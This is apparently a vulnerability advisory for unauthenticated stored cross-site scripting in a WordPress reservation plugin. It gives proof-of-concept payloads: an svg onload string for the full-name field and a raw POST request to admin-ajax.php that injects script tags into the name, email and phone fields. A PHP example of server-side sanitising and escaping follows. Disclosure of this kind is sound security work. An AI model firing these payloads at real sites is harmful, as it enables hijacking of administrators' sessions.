The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against a logged-in admin viewing the malicious reservation.
As unauthenticated, make a reservation (i.e. on a page where the [reservation_form] is embedded) and put the following payload in the FullName:

a a"><svg/onload=alert(/XSS/)>

The Phone Number and Email are also vulnerable (they are only validated client side):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 428
Connection: close

action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5d
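A server-side fix for the issue described above, as an added example that is not the plugin's own code: the three affected fields are validated and sanitised when the booking is received, and escaped again when the admin view renders them. The `example_` function names, the length limit, the phone pattern and the row markup are assumptions; the WordPress functions called are core APIs.

```php
<?php
// Added example, not the plugin's code. Names prefixed example_ are hypothetical.
// Positions 5 (full name), 6 (email) and 8 (phone) follow the request shown above.

// Server side: validate and sanitise before anything is stored.
function example_rr_clean_booking( $raw_json ) {
    $data = json_decode( wp_unslash( $raw_json ), true );
    if ( ! is_array( $data ) || count( $data ) !== 10 ) {
        return new WP_Error( 'rr_shape', 'Malformed booking data' );
    }
    foreach ( $data as $value ) {
        if ( ! is_scalar( $value ) ) { // reject nested arrays/objects
            return new WP_Error( 'rr_type', 'Unexpected field type' );
        }
    }
    $name  = sanitize_text_field( (string) $data[5] );
    $email = sanitize_email( (string) $data[6] );
    $phone = sanitize_text_field( (string) $data[8] );

    if ( '' === $name || mb_strlen( $name ) > 100 ) { // assumed length limit
        return new WP_Error( 'rr_name', 'Invalid name' );
    }
    if ( ! is_email( $email ) ) {
        return new WP_Error( 'rr_email', 'Invalid email address' );
    }
    // Assumed phone format: optional +, then 6-20 digits, spaces, dashes or brackets.
    if ( ! preg_match( '/^\+?[0-9 ()\-]{6,20}$/', $phone ) ) {
        return new WP_Error( 'rr_phone', 'Invalid phone number' );
    }
    return array( 'name' => $name, 'email' => $email, 'phone' => $phone );
}

// Admin side: escape for the output context on every render. Sanitising on
// input does not remove characters such as " that can close an attribute.
function example_rr_render_booking_row( array $booking ) {
    printf(
        '<tr><td>%1$s</td><td>%2$s</td><td>%3$s</td>' .
        '<td><input type="hidden" name="guest" value="%4$s"></td></tr>',
        esc_html( $booking['name'] ),
        esc_html( $booking['email'] ),
        esc_html( $booking['phone'] ),
        esc_attr( $booking['name'] )
    );
}
```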
Bastijn Ouwendijk
Yes
2022-09-06 (about 6 months ago)